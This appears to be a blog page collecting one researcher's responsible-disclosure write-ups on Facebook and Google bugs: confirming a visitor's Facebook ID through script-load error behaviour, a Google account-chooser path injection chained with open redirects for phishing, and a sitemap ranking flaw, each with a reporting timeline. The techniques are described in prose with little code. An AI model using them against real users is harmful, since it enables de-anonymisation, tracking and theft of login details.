I reported this to Google in November 2018, but after 5 months they had made no headway on the issue (citing internal communication difficulties), and therefore I’m publishing details such that site owners and companies can defend their own sites from this sort of attack. Google have now told me they do not have immediate plans to remedy this.
I discovered a bug that would let any web page identify a logged in FB user by confirming their ID. Facebook fixed in 6-9 months and rewarded a $1000 bounty.
In last years coverage of the Facebook / Cambridge Analytica privacy concerns, Mark Zuckerberg was asked to testify before Congress, and one of the questions they asked was around whether Facebook could track users even on other websites. There was a lot of news coverage around this aspect of Facebook, and a lot of people were up in arms. As one aspect of their response, Facebook launched a Data Abuse Bounty, with the aim of protecting user data from abuse.
So, having recently found a bug in Google’s search engine, I set out to see whether I could track or identify Facebook users when they were on other sites. After a few false starts, I managed to find a bug which allows me to identify whether a visitor is logged in to a specific Facebook account, and can check hundreds of identities per second (in the range of 500 p/s).
I have created a proof of concept of the attack (now fixed), which checks both a small known list of IDs but also allows you to enter an ID and it will confirm whether you are logged in to that account or not.
Facebook has a lot of backend endpoints which are used for various AJAX requests across the site. They are almost all are protected by
access-control-allow-origin headers and magic prefixes on JSON responses that prevent JSON hijacking and other nasty attacks.
I searched across the site looking for any endpoints that didn’t have these protections and which did pass my user id in the URL, looking for any way I may be able to parse a response from Facebook to confirm whether the UID in the URL was correct.
I also looked for any images that include the user ID in the URL and behave differently when the UID matches the logged in user (so I could do something similar to this method, but for specific IDs); the closest I got was an image that did behave differently but the URL also included Facebook’s well known
fb_dtsg parameter that is unique for users (and changes regularly) which prevented it being abused.
In addition I checked for any 301/302s in these URLs which might represent an opportunity to redirect to an image in a fashion would allow the same trick as above.
After carefully checking dozens of these endpoints I eventually found one that had a slight inconsistency in how it behaved which was a small gap but represented a weakness; it did have an
access-control-allow-origin header, but it only included a magic prefix when the user ID (in the
__user URL parameter) didn’t match, not when it did match. When the user ID provided in the URL did match the response was pure JSON.
However, because of the pesky
access-control-allow-origin header, I couldn’t call this via an XHR request as the browser would block it. At this point I thought it may be another dead end, but I eventually realised what I could do is use it as the
src for a normal
<script> block; this would of course fail but importantly it fails in a different way in both the cases (due also to the
content-type header), and in such a fashion that this can be detected via
onerror event handlers.
Here is an example of the URL for the endpoint:
that also produces an invalid UTF-16BE character, which may be an intentional defence against this attack.
I'm not sure there is a good reason not to be pre-fixing this JSON; the nice thing is that the Facebook preferred prefix (
for (;;);) produces an invalid UTF-16BE character, so would prevent the attack. Furthermore, if the string is valid then Safari still seems to try to execute the script which would also prevent the attack. Without the prefix, it is confirmed there are JSON snippets which are susceptible to this attack; whether some exist on Facebook I don't know, but it seems risk. I may be mis-understanding the risks here though.
I have created a small demo which demonstrates the attack. It checks a small list of known user IDs automatically when you arrive on the page, and also allows you to enter an ID on the page and will confirm whether you are logged in to that account.
This is limited in that you need to be checking against a known list of users, rather than just being able to determine the user’s identity automatically. However, anyone affected by the Cambridge Analytica data situation whose data is already known, they would now be able to be identified and tracked across websites even without using any Facebook APIs.
In addition, the most sinister exploiters (e.g. a repressive regime) of such a bug would likely have a list of people they cared about identifying (which they could also narrow down based on your location and other factors). A final example might be anyone on a corporate IP address or network, where the list of users is probably fair easy to harvest and is fairly finite.
So the scope is fairly narrow, the impact on many may be small, but for some that impact could be high. This would certainly be a violation of privacy for any Facebook user who did get identified.
- 20th April 2018 – I filed the initial bug report.
- 20th April 2018 – Facebook replied letting me know this was being handed to the correct team to investigate.
- 1st May 2018 – I requested an update.
- 2nd May 2018 – FB replied – still investigating.
- 23rd May 2018 – I requested an update, noticing it was fixed in Chrome but not Safari.
- 23rd May 2018 – FB replied – they were investigating solutions.
- 20th June 2018 – FB awarded a $1000 bounty.
- 1st October 2018 – I requested permission to publish.
- 1st October 2018 – FB replied they were still working on the fix, and they’d update me.
- 19th February 2019 – I followed up and FB seemed happy for me to publish.
(It is unclear when the final fix rolled – it looks like 6-9 months after I reported it.)
Specifically, it allows an attack to craft a URL to an authentic Google login page (where the user must pick from a list of their accounts) such that the destination for any one of those accounts is to a page the attacker controls.
For people with multiple Google accounts, such as myself, we are quite accustomed to being presented with a list of our Google accounts from which we need to select one to log in to. One form of this Google page embeds (for reasons lost on me) the list of email addresses to show inside the URL:
(It is normal for there to be only placeholder icons, hack or not)
I first discovered this page well over a year ago, but other than manipulating the email addresses to say rude words I couldn’t find much malicious to do with it. I recently re-discovered the page, and thought I would take another look at what I could do with it.
I discovered the page uses the parameters not only to present the list of email addresses but also as a factor in controlling where the login flow takes the user to when they select an account, which involves a failure in server-side validation.
Specifically, I found that if I presented emails in a certain format the section after the
@ symbol would be used as the path for the following page. Because it is a GSuite page, some server side code attempts to parse the domain from the email then use that to form the path for the following page. However, it does not validate the domain correctly, allowing an attacker to form aribtrary paths.
However, adding such a path did disfigure the listings on the page, such that it was obvious that something was amiss. To counteract this, I simply abused the fact that CSS was used to crop overly long email addresses, and given that invalid email addresses are allowed through here, I simply dressed it up with the full name of the user before (as is standard on these pages most of the time anyway).
To get URL parameters to pass through, I simply put them in the URL before the list of
u parameters specifying emails (marked  in the screenshot) and these parameters would then be added to the destination path. You can see marked  in the screenshot, that this worked because the
window.location.pathname is used, which means the query string remains intact.
Now I was able to use abuse existing open redirect via a logout redirect page (so doesn’t require users to be logged in already to work) via another Google open redirect to forward the user to any page of my choosing. There are many such open redirectors on Google.com, so many options to abuse this.
Here is a demo:
The redirect I am using shows a redirect message, but I did later site step that. You could also redirect to a more misleading domain, of course. The result is that you start on an authentic Google account page, and when you select an account that you expect takes you to a password entry page, you arrive at one. However, this page is actually a malicious page being controlled by the attacker, who is now going to steal your login details. They can then redirect you back to an official Google page to cover their tracks.
I reported this to Google who said they already had a bug filed against it, but after some back and forth it seems that was something else. Unfortunately, Google deemed it “does not meet the bar for a financial reward”.
17th July 2017 – I reported this to the security team via their form.
17th July 2017 – I heard back it was triaged and awaiting attention.
20th July 2017 – I followed up to supply some more information. I was concerned it would be flagged purely as a phishing issue, or open redirect. I also thought they may think it was just the issue that an attacker can control the list of accounts and miss the fact that the URL parsing is broken such that malicious links can be injected.
20th July 2017 – The team came back to me and told me they were already aware of this issue, so it was not eligible for a bug bounty.
21st July 2017 – I shared a draft of this write up with the Google team.
3rd August 2017 – Google came back letting me know they are working on the issue, but in doing so also revealed that (due to my poor explanation!) they had mis-understood the primary issue I was reporting.
4th+7th August 2017 – I replied giving some more details on the exact issue.
11th August 2017 – I followed up.
17th August 2017 – Google replied saying it was actually different, and saying I should follow up in 2-3 weeks.
14th September 2017 – I followed up.
15th September 2017 – Google security team replied saying they hadn’t heard back from the team responsible, and said they would follow up.
2nd October 2017 – I followed up.
12th October 2017 – Google team said still no status update.
3rd November 2017 – I followed up.
20th November 2017 – I followed up.
15th December 2017 – Google team said still no status update.
25th January 2018 – I followed up.
13th March 2018 – Google team said still no status update.
14th April 2018 – I followed up, now 9 months since report.
15th May 2018 – Google let me know a fix is a few days out.
8th June 2018 – Google confirm I can publish.
2nd August 2018 – Google confirmed it “does not meet the bar for a financial reward”.
Similar to the other bug that I recently reported, this is quite a specific attack as it needs to target a specific user, but it is potentially high impact. Furthermore, it may be that the missing validation on the parameter allows for other nefarious uses, but I didn’t dig deeper once I identified the issue.
As usual, a big thanks to the Google team! 🙂
For the $12 cost of a domain, I was able to rank in Google search results with Amazon, Walmart etc. for high value money terms in the US. The Adwords bid price for some these terms is currently around $1 per click, and companies are spendings 10s of thousands of dollars a month to appear as ads on these search results, and I was appearing for free.
Google have now fixed the issue and awarded a bug bounty of $5000.
Google provides an open URL where you can ‘ping’ an XML sitemap which they will fetch and parse – this file can contain indexation directives. I discovered that for many sites it is possible to ping a sitemap that you (the attacker) are hosting in such a way that Google will trust the evil sitemap as belonging to the victim site.
I believe this is the first time they have awarded a bounty for a security issue in the actual search engine, which directly affects the ranking of sites.
Math.random() function produces an entirely deterministic series. I created a small script which uses this identify Google in an obfuscated fashion:
I recently reported an issue to Google, which allows an attacker to confirm whether a visitor to a web page is logged in to any one of a list of specific Google accounts (including GSuite accounts). It is possible to check about 1000 email addresses every 25 seconds. Google have confirmed this as working as intended, and not considered a bug.
You can test it out yourself on this demo page.
Firstly, a video of a proof of concept, where I identify an account (myself) against a list of 20 accounts: